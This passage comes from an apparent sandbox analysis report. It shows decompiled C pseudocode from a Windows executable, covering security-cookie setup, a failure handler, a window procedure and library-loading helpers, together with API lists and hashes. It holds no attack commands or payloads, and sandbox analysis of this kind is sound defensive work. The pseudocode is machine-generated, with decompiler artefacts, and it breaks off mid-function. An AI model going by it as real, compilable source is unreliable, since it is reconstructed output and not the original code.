                                                    • Part of subcall function 00041593: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000415C1
                                                    • Part of subcall function 00041593: GetCurrentProcessId.KERNEL32 ref: 000415CD
                                                    • Part of subcall function 00041593: GetCurrentThreadId.KERNEL32 ref: 000415D5
                                                    • Part of subcall function 00041593: GetTickCount.KERNEL32 ref: 000415DD
                                                    • Part of subcall function 00041593: QueryPerformanceCounter.KERNEL32(?), ref: 000415E9
                                                  • GetStartupInfoW.KERNEL32(?,000418A0,0000005C), ref: 000417A9
                                                  • InterlockedCompareExchange.KERNEL32(00045068,?,00000000), ref: 000417D1
                                                  • _initterm.MSVCRT ref: 0004182E
                                                  • InterlockedExchange.KERNEL32(00045068,00000000), ref: 00041846
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: CurrentExchangeInterlockedTime$CompareCountCounterFileInfoPerformanceProcessQueryStartupSystemThreadTick_initterm
                                                  • String ID:
                                                  • API String ID: 812915189-0
                                                  • Opcode ID: d906088546440f99efed7d84eb5acbfbce91903abb6063d82af2d8ef9033d8d0
                                                  • Instruction ID: 58a536cab8a72b5b8348aa7d9e84125aaef6bd81343de58becbbe23c28ca4304
                                                  • Opcode Fuzzy Hash: d906088546440f99efed7d84eb5acbfbce91903abb6063d82af2d8ef9033d8d0
                                                  • Instruction Fuzzy Hash: CD41B0F9944305DFEB64AF50ED856FD77B4EB06702B50003EE102A6192DB785DC09B5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 70%
                                                  			E00041B87(void* __edx, void* __eflags, intOrPtr _a4, char* _a8, int _a12, short* _a16, struct HINSTANCE__** _a20, intOrPtr* _a24, char** _a28) {
                                                  				int _v8;
                                                  				char _v12;
                                                  				struct HINSTANCE__* _v16;
                                                  				intOrPtr _v20;
                                                  				struct HINSTANCE__* _t36;
                                                  				intOrPtr _t38;
                                                  				long _t44;
                                                  				char* _t45;
                                                  				short* _t51;
                                                  				int _t61;
                                                  
                                                  				_t57 = __edx;
                                                  				 *_a20 = 0;
                                                  				 *_a24 = 0;
                                                  				_v8 = 0;
                                                  				 *_a28 = 0; // executed
                                                  				_t36 = E000414BD(_a4, _a8); // executed
                                                  				_v16 = _t36;
                                                  				if(_t36 != 0) {
                                                  					_v12 = 0;
                                                  					_t38 = E00041C02(_t36, _a12,  &_v12);
                                                  					_v20 = _t38;
                                                  					if(_t38 == 0) {
                                                  						E0004389E(__edx, _a4, 0x400, _a8, _a12);
                                                  						goto L12;
                                                  					} else {
                                                  						_v8 = 1;
                                                  						if(_v12 != 0) {
                                                  							_t51 = _a16;
                                                  							if(_t51 == 0 ||  *_t51 == 0) {
                                                  								goto L3;
                                                  							} else {
                                                  								_t61 = lstrlenW(_t51) + 1;
                                                  								_t44 = WideCharToMultiByte(0, 0x400, _t51, _t61, 0, 0, 0, 0);
                                                  								_a12 = _t44;
                                                  								_t45 = LocalAlloc(0, _t44);
                                                  								_a8 = _t45;
                                                  								_push(0);
                                                  								if(_t45 == 0) {
                                                  									_push(_a16);
                                                  									_push(0x300);
                                                  									_push(_a4);
                                                  									E0004389E(_t57);
                                                  									_v8 = 0;
                                                  									L12:
                                                  									FreeLibrary(_v16);
                                                  									goto L4;
                                                  								} else {
                                                  									WideCharToMultiByte(0, 0x400, _a16, _t61, _t45, _a12, 0, ??);
                                                  									 *_a28 = _a8;
                                                  									goto L3;
                                                  								}
                                                  							}
                                                  							L13:
                                                  						} else {
                                                  							L3:
                                                  							 *_a20 = _v16;
                                                  							 *_a24 = _v20;
                                                  						}
                                                  					}
                                                  					L4:
                                                  				}
                                                  				return _v8;
                                                  				goto L13;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 000414BD: LoadLibraryExW.KERNELBASE(?,00000000,00000008,00000000,00000000,00000001), ref: 000414E7
                                                    • Part of subcall function 000414BD: RtlImageNtHeader.NTDLL(00000000), ref: 000414FC
                                                    • Part of subcall function 000414BD: SetProcessDEPPolicy.KERNEL32(00000003), ref: 00041513
                                                    • Part of subcall function 00041C02: lstrlenW.KERNEL32(?,00000000,00000000,00000001,?,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000), ref: 00041C27
                                                    • Part of subcall function 00041C02: LocalAlloc.KERNEL32(00000000,00000002,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C38
                                                    • Part of subcall function 00041C02: WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000001,00000000,00000000,00000000,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?), ref: 00041C54
                                                    • Part of subcall function 00041C02: lstrlenA.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C5F
                                                    • Part of subcall function 00041C02: GetProcAddress.KERNEL32(?,00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C79
                                                    • Part of subcall function 00041C02: LocalFree.KERNEL32(00000000,?,00041BC8,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?,00000001), ref: 00041C87
                                                  • lstrlenW.KERNEL32(00000001,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 00042189
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,00000001,00000001,00000000,00000000,00000000,00000000), ref: 000421A4
                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 000421AB
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,00000001,00000000,?,00000000,00000000), ref: 000421CC
                                                  • FreeLibrary.KERNEL32(?,?,00000400,?,00000000,00000000,00000000,?,00000000,00000001,?,?,00000001,00000000,?,?), ref: 000424AA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFreeLibrary$AddressHeaderImageLoadPolicyProcProcess
                                                  • String ID:
                                                  • API String ID: 2400347670-0
                                                  • Opcode ID: c5bdf6414e5e32c1ca4cab167ab411f004adb9e01aa4cac2b3916581eebb3c09
                                                  • Instruction ID: 25a0d2a2cf8954c9bce27960f226653dd33a1734158ac318006a8988beec83c4
                                                  • Opcode Fuzzy Hash: c5bdf6414e5e32c1ca4cab167ab411f004adb9e01aa4cac2b3916581eebb3c09
                                                  • Instruction Fuzzy Hash: FC3126B5901218AFCB129F95CD84DEEBFB8FF49750F108065F905A7210D3709A91CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 81%
                                                  			E000429B3(WCHAR* _a4) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				void _v72;
                                                  				struct _OVERLAPPED* _v76;
                                                  				long _v80;
                                                  				signed short _v324;
                                                  				void _v328;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t17;
                                                  				int _t22;
                                                  				long _t25;
                                                  				int _t28;
                                                  				void* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				signed int _t37;
                                                  
                                                  				_v8 =  *0x45040 ^ _t37;
                                                  				_v76 = 0;
                                                  				_t17 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_t30 = _t17;
                                                  				if(_t30 == 0xffffffff) {
                                                  					L7:
                                                  					return E00041189(_v76, _t30, _v8 ^ _t37, _t33, _t34, 0);
                                                  				}
                                                  				_push(_t34);
                                                  				_t22 = ReadFile(_t30,  &_v72, 0x40,  &_v80, 0); // executed
                                                  				if(_t22 != 0 && 0x5a4d == _v72) {
                                                  					_t25 = SetFilePointer(_t30, _v12, 0, 0); // executed
                                                  					if(_t25 != 0xffffffff) {
                                                  						_t28 = ReadFile(_t30,  &_v328, 0xf8,  &_v80, 0); // executed
                                                  						if(_t28 != 0) {
                                                  							_v76 = _v324 & 0x0000ffff;
                                                  						}
                                                  					}
                                                  				}
                                                  				CloseHandle(_t30); // executed
                                                  				_pop(_t34);
                                                  				goto L7;
                                                   			}

                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 000429E3
                                                  • ReadFile.KERNELBASE(00000000,?,00000040,?,00000000), ref: 00042A03
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00042A1A
                                                  • ReadFile.KERNELBASE(00000000,?,000000F8,?,00000000), ref: 00042A37
                                                  • CloseHandle.KERNELBASE(00000000), ref: 00042A48
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                   • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: File$Read$CloseCreateHandlePointer
                                                  • String ID:
                                                  • API String ID: 3856724686-0
                                                  • Opcode ID: aafc404e23e49ad47332fe1b75e252dd3dd038bd0f8cff156fa0987f2a81a17b
                                                  • Instruction ID: 81b30619a5d1a3053106adc751af63b7f81899f0153c371ddcf437edf25ec908
                                                  • Opcode Fuzzy Hash: aafc404e23e49ad47332fe1b75e252dd3dd038bd0f8cff156fa0987f2a81a17b
                                                  • Instruction Fuzzy Hash: 5E1181B5600118BBD720EB65DC84FEE7BACEF45750F500161FA15E21A0D6B4DD86CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00041593() {
                                                  				struct _FILETIME _v12;
                                                  				signed int _v16;
                                                  				union _LARGE_INTEGER _v20;
                                                  				signed int _t14;
                                                  				signed int _t16;
                                                  				signed int _t17;
                                                  				signed int _t18;
                                                  				signed int _t22;
                                                  				signed int _t23;
                                                  				signed int _t32;
                                                  
                                                  				_t14 =  *0x45040;
                                                  				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                  				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
                                                  				if(_t14 != 0xbb40e64e) {
                                                  					if((0xffff0000 & _t14) == 0) {
                                                  						goto L1;
                                                  					}
                                                  					_t23 =  !_t14;
                                                  					 *0x45044 = _t23;
                                                  					return _t23;
                                                  				}
                                                  				L1:
                                                  				GetSystemTimeAsFileTime( &_v12);
                                                  				_t16 = GetCurrentProcessId();
                                                  				_t17 = GetCurrentThreadId();
                                                  				_t18 = GetTickCount();
                                                  				QueryPerformanceCounter( &_v20);
                                                  				_t22 = _v16 ^ _v20.LowPart;
                                                  				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
                                                  				if(_t32 == 0xbb40e64e || ( *0x45040 & 0xffff0000) == 0) {
                                                  					_t32 = 0xbb40e64f;
                                                  				}
                                                  				 *0x45040 = _t32;
                                                  				 *0x45044 =  !_t32;
                                                  				return _t22;
                                                   			}

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000415C1
                                                  • GetCurrentProcessId.KERNEL32 ref: 000415CD
                                                  • GetCurrentThreadId.KERNEL32 ref: 000415D5
                                                  • GetTickCount.KERNEL32 ref: 000415DD
                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 000415E9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                   • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                  • String ID:
                                                  • API String ID: 1445889803-0
                                                  • Opcode ID: 937273a3c8b1958c1f60650467ab4cb5aa303aa6c972e9c2e6c977c19cd4b52b
                                                  • Instruction ID: e7bc8aadafea34ca16ac26b10458200d7b5481a1b1fc45b561e03c38f7da7dc7
                                                  • Opcode Fuzzy Hash: 937273a3c8b1958c1f60650467ab4cb5aa303aa6c972e9c2e6c977c19cd4b52b
                                                  • Instruction Fuzzy Hash: CB1108FEC00114ABDB209BB4DE486EEB7F4FB09342F560421D905E7215D7789D808B88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00041189(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                  				intOrPtr _v0;
                                                  				void* _v804;
                                                  				intOrPtr _v808;
                                                  				intOrPtr _v812;
                                                  				intOrPtr* _t26;
                                                  
                                                  				if(__ecx !=  *0x45040) {
                                                  					 *0x45180 = __eax;
                                                  					 *0x4517c = __ecx;
                                                  					 *0x45178 = __edx;
                                                  					 *0x45174 = __ebx;
                                                  					 *0x45170 = __esi;
                                                  					 *0x4516c = __edi;
                                                  					 *0x45198 = ss;
                                                  					 *0x4518c = cs;
                                                  					 *0x45168 = ds;
                                                  					 *0x45164 = es;
                                                  					 *0x45160 = fs;
                                                  					 *0x4515c = gs;
                                                  					asm("pushfd");
                                                  					_pop( *0x45190);
                                                  					 *0x45184 =  *_t26;
                                                  					 *0x45188 = _v0;
                                                  					 *0x45194 =  &_a4;
                                                  					 *0x450d0 = 0x10001;
                                                  					 *0x4508c =  *0x45188;
                                                  					 *0x45080 = 0xc0000409;
                                                  					 *0x45084 = 1;
                                                  					_v812 =  *0x45040;
                                                  					_v808 =  *0x45044;
                                                  					SetUnhandledExceptionFilter(0);
                                                  					UnhandledExceptionFilter(E00043F68);
                                                  					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                  				} else {
                                                  					return __eax;
                                                  				}
                                                   			}

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00043F40
                                                  • UnhandledExceptionFilter.KERNEL32(00043F68), ref: 00043F4B
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00043F56
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00043F5D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                   • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                  • String ID:
                                                  • API String ID: 3231755760-0
                                                  • Opcode ID: 273cea3f3df8d37eca0a3490b5588365d4c53ea290892d2f9ef6b81ad00f4b10
                                                  • Instruction ID: 57b4ff92fb6afa135e894c11d63b8320e263f39f7c72e863adb44de4193133e4
                                                  • Opcode Fuzzy Hash: 273cea3f3df8d37eca0a3490b5588365d4c53ea290892d2f9ef6b81ad00f4b10
                                                  • Instruction Fuzzy Hash: 4A216DFC801A44AFE750EF69EF447483BB4BB0A346B905019E6088B272E7B85585CF5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 238 4119b-411c7 239 411cd-411d1 238->239 240 421f8-42206 GetWindowLongW 238->240 243 422e7-422ee 239->243 244 411d7-411e9 DefWindowProcW 239->244 241 422cc 240->241 242 4220c-4221c GetWindow 240->242 241->243 247 42222-42252 memset GetClassNameW 242->247 248 422cb 242->248 243->244 245 422f4-422f9 243->245 246 411ef-411fb call 41189 244->246 249 42305-42312 SetWindowLongW 245->249 250 422fb-422ff SetClassLongW 245->250 252 42254-42271 CompareStringW 247->252 253 4227a-42285 GetWindow 247->253 248->241 249->246 250->249 252->253 255 42273-42278 GetWindow 252->255 253->248 256 42287-42294 GetWindowLongW 253->256 255->253 256->248 257 42296-422a3 GetClassLongW 256->257 257->248 258 422a5-422c5 GetClassLongW SetWindowLongW SetClassLongW 257->258 258->248
                                                  C-Code - Quality: 86%
                                                  			E0004119B(void* __ebx, void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                  				signed int _v8;
                                                  				void _v166;
                                                  				short _v168;
                                                  				struct HWND__* _v172;
                                                  				long _v176;
                                                  				void* __esi;
                                                  				long _t25;
                                                  				long _t27;
                                                  				long _t38;
                                                  				long _t44;
                                                  				void* _t53;
                                                  				struct HWND__* _t55;
                                                  				signed int _t57;
                                                  
                                                  				_t54 = __edi;
                                                  				_t47 = __ebx;
                                                  				_v8 =  *0x45040 ^ _t57;
                                                  				_t25 = _a16;
                                                  				_t56 = _a4;
                                                  				_v172 = _t56;
                                                  				_v176 = _t25;
                                                  				if(_a8 == 0x1c) {
                                                  					_push(__ebx);
                                                  					if(GetWindowLongW(_t56, 0) == 0) {
                                                  						L14:
                                                  						_pop(_t47);
                                                  						L2:
                                                  						_t27 = DefWindowProcW(_v172, _a8, _a12, _v176);
                                                  						L3:
                                                  						return E00041189(_t27, _t47, _v8 ^ _t57, _t53, _t54, _t56);
                                                  					}
                                                  					_push(__edi);
                                                  					_t56 = GetWindow;
                                                  					_t55 = GetWindow(GetWindow, 3);
                                                  					if(_t55 == 0) {
                                                  						L13:
                                                  						_pop(_t54);
                                                  						goto L14;
                                                  					}
                                                  					_v168 = 0;
                                                  					memset( &_v166, 0, 0x9e);
                                                  					if(GetClassNameW(_t55,  &_v168, 0x50) != 0 && CompareStringW(0x7f, 1,  &_v168, 0xffffffff, ?str?, 0xffffffff) == 2) {
                                                  						_t55 = GetWindow(_t55, 3);
                                                  					}
                                                  					if(GetWindow(_t55, 4) == _v172) {
                                                  						_t56 = GetWindowLongW(_t55, 0xffffffec);
                                                  						if((_t56 & 0x00040080) == 0 && GetClassLongW(_t55, 0xffffffde) == 0) {
                                                  							_t38 = GetClassLongW(_v172, 0xfffffff2);
                                                  							SetWindowLongW(_t55, 0xffffffec, _t56);
                                                  							SetClassLongW(_t55, 0xffffffde, _t38);
                                                  						}
                                                  					}
                                                  					goto L13;
                                                  				}
                                                  				if(_a8 == 0x4e) {
                                                  					if( *((intOrPtr*)(_t25 + 8)) != 0xfffffe0c) {
                                                  						goto L2;
                                                  					}
                                                  					_t44 =  *(_t25 + 0xc);
                                                  					if(_t44 != 0) {
                                                  						SetClassLongW(_t56, 0xfffffff2, _t44);
                                                  					}
                                                  					SetWindowLongW(_t56, 0, 1);
                                                  					_t27 = 0;
                                                  					goto L3;
                                                  				}
                                                  				goto L2;
                                                   			}

                                                  APIs
                                                  • DefWindowProcW.USER32(?,0000004E,?,?), ref: 000411E9
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00042202
                                                  • GetWindow.USER32(?,00000003), ref: 00042216
                                                  • memset.MSVCRT ref: 00042238
                                                  • GetClassNameW.USER32(00000000,?,00000050), ref: 0004224A
                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00042268
                                                  • GetWindow.USER32(00000000,00000003), ref: 00042276
                                                  • GetWindow.USER32(00000000,00000004), ref: 0004227D
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0004228A
                                                  • GetClassLongW.USER32 ref: 0004229F
                                                  • GetClassLongW.USER32 ref: 000422AD
                                                  • SetWindowLongW.USER32 ref: 000422BB
                                                  • SetClassLongW.USER32(00000000,000000DE,00000000), ref: 000422C5
                                                  • SetClassLongW.USER32(?,000000F2,0000004E), ref: 000422FF
                                                  • SetWindowLongW.USER32 ref: 0004230A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                   • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$Class$CompareNameProcStringmemset
                                                  • String ID: IME$N
                                                  • API String ID: 1578343765-3965882335
                                                  • Opcode ID: 1e1f4496f95872ec2fdbec538e1ef1139924ccdce9667ec5d5f4eed1c0ee6dea
                                                  • Instruction ID: f8cb4220f3f9d60662fb9541395479f856ad3d627a33b7d482f58d94ead6049c
                                                  • Opcode Fuzzy Hash: 1e1f4496f95872ec2fdbec538e1ef1139924ccdce9667ec5d5f4eed1c0ee6dea
                                                  • Instruction Fuzzy Hash: F441F3B4700314BBDF209B65CE44FEE76A8AF4A720F504261F615E61E0DBB48D808B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 259 43b77-43bbc 260 43bc1-43bc6 259->260 261 43bbe 259->261 262 43c40-43c44 260->262 263 43bc8-43bd7 LoadLibraryExA 260->263 261->260 266 43c46-43c4d 262->266 267 43c4f-43c53 262->267 264 43c1e-43c26 GetLastError 263->264 265 43bd9-43be6 InterlockedCompareExchange 263->265 270 43c2f-43c3b InterlockedCompareExchange 264->270 271 43c28-43c2d 264->271 268 43c13-43c1c FreeLibrary 265->268 269 43be8-43c07 265->269 272 43c82-43c8b DelayLoadFailureHook 266->272 267->272 273 43c55-43c64 GetProcAddress 267->273 268->262 269->262 276 43c09-43c11 269->276 270->266 278 43c3d 270->278 271->270 271->272 277 43c8d-43c91 272->277 274 43c66-43c6e GetLastError 273->274 275 43c77 273->275 274->275 279 43c70-43c75 274->279 280 43c7e-43c80 275->280 276->262 281 43c93-43c96 277->281 282 43c98-43c9e 277->282 278->262 279->275 279->280 280->272 280->277 281->282
                                                  C-Code - Quality: 83%
                                                  			E00043B77(struct HINSTANCE__* _a4, int* _a8) {
                                                  				signed int _v8;
                                                  				CHAR* _v12;
                                                  				struct HINSTANCE__* _v24;
                                                  				CHAR* _v36;
                                                  				void _v44;
                                                  				char _v48;
                                                  				struct HINSTANCE__* _t34;
                                                  				int _t37;
                                                  				int _t41;
                                                  				CHAR* _t45;
                                                  				signed short _t47;
                                                  				signed int _t48;
                                                  				void* _t51;
                                                  				struct HINSTANCE__* _t56;
                                                  				LONG* _t60;
                                                  				int _t61;
                                                  				int _t62;
                                                  
                                                  				_t34 = _a4;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t60 =  *((intOrPtr*)(_t34 + 8)) + 0x40000;
                                                  				_t51 =  *_t60;
                                                  				_t45 =  *((intOrPtr*)(_t34 + 4)) + 0x40000;
                                                  				_t47 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x40000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x40000 >> 2) * 4);
                                                  				_a4 = _t51;
                                                  				_t13 = _t47 + 0x40002; // 0x80002
                                                  				_t37 = _t13;
                                                  				if(_t47 < 0) {
                                                  					_t37 = _t47 & 0x0000ffff;
                                                  				}
                                                  				_v12 = _t37;
                                                  				if(_t51 != 0) {
                                                  					L12:
                                                  					if(_a4 != 0xffffffff) {
                                                  						if(_a4 == 0) {
                                                  							L20:
                                                  							_push(_v12);
                                                  							_push(_t45);
                                                  							L00043CCE();
                                                  							_t61 = _t37;
                                                  							L21:
                                                  							if(_v8 != 0) {
                                                  								 *_a8 = _t61;
                                                  							}
                                                  							return _t61;
                                                  						}
                                                  						_t37 = GetProcAddress(_a4, _v12);
                                                  						_t61 = _t37;
                                                  						if(_t61 != 0) {
                                                  							L18:
                                                  							_v8 = 1;
                                                  							L19:
                                                  							if(_t61 != 0) {
                                                  								goto L21;
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						_t37 = GetLastError();
                                                  						if(_t37 == 0x7f || _t37 == 0xb6) {
                                                  							goto L18;
                                                  						} else {
                                                  							goto L19;
                                                  						}
                                                  					}
                                                  					L13:
                                                  					_v8 = 1;
                                                  					goto L20;
                                                  				}
                                                  				_t56 = LoadLibraryExA(_t45, _t51, _t51);
                                                  				_a4 = _t56;
                                                  				if(_t56 == 0) {
                                                  					_t37 = GetLastError();
                                                  					if(_t37 == 0x7e || _t37 == 0xc1) {
                                                  						_t37 = InterlockedCompareExchange(_t60, 0xffffffff, 0);
                                                  						if(_t37 == 0) {
                                                  							goto L13;
                                                  						}
                                                  						_a4 = _t37;
                                                  						goto L12;
                                                  					} else {
                                                  						goto L20;
                                                  					}
                                                  				}
                                                  				_t41 = InterlockedCompareExchange(_t60, _t56, 0);
                                                  				_t62 = _t41;
                                                  				if(_t62 != 0) {
                                                  					_t37 = FreeLibrary(_t56);
                                                  					_a4 = _t62;
                                                  				} else {
                                                  					_t48 = 8;
                                                  					memset( &_v44, _t41, _t48 << 2);
                                                  					_v24 = _a4;
                                                  					_t37 =  *0x43ca4; // 0x0
                                                  					_v48 = 0x24;
                                                  					_v36 = _t45;
                                                  					if(_t37 != 0) {
                                                  						_t37 =  *_t37(5,  &_v48);
                                                  					}
                                                  				}
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                  • LoadLibraryExA.KERNEL32(00000000), ref: 00043BCB
                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00043BDD
                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00043C14
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00043C5B
                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 00043C66
                                                  • DelayLoadFailureHook.KERNEL32(00000000,00000000), ref: 00043C86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                  • Associated: 00000004.00000002.947171746.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000004.00000002.947179183.0000000000046000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_40000_r8F8A.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressCompareDelayErrorExchangeFailureFreeHookInterlockedLastProc
                                                  • String ID: $
                                                  • API String ID: 3506490669-3993045852
                                                  • Opcode ID: 4e38aa845ffde29792e7ee2ed045ecdae4d34d9aef074966e2cafc82ed956215
                                                  • Instruction ID: 92f7d381e86d209566b6a78ca588a7fc3dcd920786c44ca8cf94b972a21cda5e
                                                  • Opcode Fuzzy Hash: 4e38aa845ffde29792e7ee2ed045ecdae4d34d9aef074966e2cafc82ed956215
                                                  • Instruction Fuzzy Hash: 14319FF1900219AFDB259F68C8C5BEDB7E4AF54750F25A139F904BB292C770DB408B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E00041C02(struct HINSTANCE__* _a4, short* _a8, intOrPtr* _a12) {
                                                  				_Unknown_base(*)()* _v8;
                                                  				WCHAR* _t21;
                                                  				_Unknown_base(*)()* _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				void* _t39;
                                                  				short* _t41;
                                                  				int _t44;
                                                  				int _t49;
                                                  				_Unknown_base(*)()** _t51;
                                                  
                                                  				 *_a12 = 0;
                                                  				_t21 = _a8;
                                                  				_v8 = 0;
                                                  				if(_t21 == 0) {
                                                  					L7:
                                                  					return _v8;
                                                  				}
                                                  				if( *_t21 == 0x23) {
                                                  					_t41 =  &(_t21[1]);
                                                  					if( *_t41 == 0) {
                                                  						goto L2;
                                                  					}
                                                  					__imp___wtoi(_t41);
                                                  					_v8 = GetProcAddress(_a4, _t21 & 0x0000ffff);
                                                  					goto L7;
                                                  				}
                                                  				L2:
                                                  				_t49 = lstrlenW(_t21) + 1;
                                                  				_t44 = _t49 + _t49;
                                                  				_t5 = _t44 + 2; // 0x2
                                                  				_t39 = LocalAlloc(0, _t5);
                                                  				if(_t39 == 0) {
                                                  					L6:
                                                  					goto L7;
                                                  				}
                                                  				if(WideCharToMultiByte(0, 0x400, _a8, _t49, _t39, _t44, 0, 0) != 0) {
                                                  					_t51 = _t39 + lstrlenA(_t39);
                                                  					 *_t51 = 0x57;
                                                  					 *((char*)(_t51 + 1)) = 0;
                                                  					_t30 = GetProcAddress(_a4, _t39);
                                                  					_v8 = _t30;
                                                  					if(_t30 == 0) {
                                                  						 *_a12 = 1;
                                                  						 *_t51 = 0x41;
                                                  						_t32 = GetProcAddress(_a4, _t39);
                                                  						_v8 = _t32;
                                                  						if(_t32 == 0) {
                                                  							 *_t51 = _t32;
